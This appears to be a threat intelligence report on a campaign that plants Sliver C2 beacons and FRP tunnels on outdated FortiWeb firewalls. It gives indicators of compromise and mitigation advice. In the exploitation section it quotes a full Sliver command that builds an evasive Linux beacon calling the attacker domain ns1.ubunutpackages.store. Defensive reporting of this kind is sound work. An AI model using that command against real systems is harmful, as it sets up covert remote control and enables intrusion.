Threat Overview

The latest threat intelligence report, published by CyberHunter_NL on January 6, 2026, details a sophisticated campaign in which a threat actor has leveraged multiple outdated FortiWeb web application firewalls to establish long‑term persistence via the Sliver command and control (C2) framework. The attackers have specifically targeted firmware versions 5.4.202 through 6.1.62, exploiting public‑facing vulnerabilities that remain unpatched in a large portion of the enterprise edge device population.

FortiWeb appliances are typically deployed as trusted perimeter defenses, and their compromise offers a highly valuable foothold for adversaries. By embedding the Sliver implant directly onto the firewall, the threat actor gains privileged visibility into network traffic and can execute privileged commands with minimal detection risk.

Actor Profile

The group behind this operation is known for its methodical use of open‑source offensive tools, such as React2Shell (CVE‑2025‑55182) and the Fast Reverse Proxy (FRP) utility. Their operational focus appears to be on South Asian targets, as evidenced by the use of decoy domains that mimic legitimate services, including ns1.ubunutpackages.store and ns1.bafairforce.army. These domains host fake content designed to lure defenders into a false sense of security.

Exploitation Pathway

Initial compromise begins with the exploitation of known vulnerabilities in FortiWeb firmware. While the precise vulnerability used remains unconfirmed, the attackers have been observed leveraging the CVE‑2025‑55182 vulnerability in parallel operations. Once a foothold is achieved, the threat actor deploys the FRP tool to expose internal services, creating a direct bridge between the victim’s internal network and the attacker’s external control systems.

The FRP deployment is accompanied by the generation of a Sliver beacon configured to reconnect every 120 seconds. The beacon is crafted using the following command extracted from the attacker’s logs: generate beacon --http ns1.ubunutpackages.store --reconnect 120 --strategy r --template ubuntu --os linux --evasion --save ./system-updater --seconds 60. This configuration ensures the beacon blends in with legitimate Linux processes, thereby evading basic behavioral detection.

Command and Control Architecture

The attacker’s C2 infrastructure is built around a network of decoy domains and fake repositories. The beacon payload is deployed to /bin/.root/system-updater on the compromised FortiWeb devices, masquerading as a system update utility. The use of legitimate domain names and repository structures further obfuscates the malicious traffic, making it difficult for conventional security controls to flag the activity.

Indicators of Compromise

Security analysts should monitor for the following indicators: (1) outbound HTTPS traffic to domains such as ns1.ubunutpackages.store and ns1.bafairforce.army; (2) the presence of a binary named system-updater in /bin/.root/ directories on FortiWeb appliances; (3) FRP listening sockets on non‑standard ports; (4) repeated beacon reconnection attempts every 120 seconds; and (5) anomalous traffic patterns originating from FortiWeb firmware versions 5.4.202 to 6.1.62. Additionally, open‑directory scans on public IPs may reveal exposed Sliver C2 databases and logs, as identified by Ctrl‑Alt‑Int3l analysts.

Operational Impact

The compromise of FortiWeb devices provides the threat actor with a stable entry point for broader network infiltration. By maintaining persistence on these edge devices, attackers can monitor traffic, exfiltrate data, and pivot to internal assets with minimal lateral movement. The long‑term nature of this campaign poses a significant risk to critical security infrastructure that is typically trusted and less frequently inspected.

Recommendations for Mitigation

1. Patch Management: Immediately update all FortiWeb appliances to the latest firmware, ensuring that versions 5.4.202 through 6.1.62 are no longer in use. Prioritize devices that are publicly exposed.

2. Network Segmentation: Isolate FortiWeb appliances from internal networks and enforce strict egress controls to prevent unauthorized outbound connections to suspicious domains.

3. Endpoint Detection and Response (EDR): Deploy EDR solutions that can detect the presence of the Sliver beacon binary and monitor for FRP usage. Implement file integrity monitoring on /bin/.root/ directories.

4. Threat Hunting: Conduct regular scans for outbound traffic to known decoy domains and for the specific beacon reconnection pattern. Use threat intelligence feeds to update detection rules.

5. Incident Response: Prepare a playbook that includes steps to isolate compromised FortiWeb devices, purge malicious binaries, and perform a thorough forensic analysis of the device firmware and configuration.

6. Security Awareness: Educate network defenders about the use of decoy domains and the importance of scrutinizing seemingly legitimate traffic, especially from edge devices.

By implementing these controls, organizations can reduce the attack surface presented by legacy FortiWeb appliances and mitigate the risk of persistent adversary presence.

Conclusion

This threat report underscores the evolving tactics of adversaries who exploit trusted security appliances to achieve persistence. The combination of public‑facing vulnerabilities, open‑source tools like FRP, and sophisticated C2 infrastructure demonstrates a high level of operational security and stealth. Security analysts must remain vigilant, applying rigorous patching, segmentation, and monitoring practices to defend against similar campaigns in the future.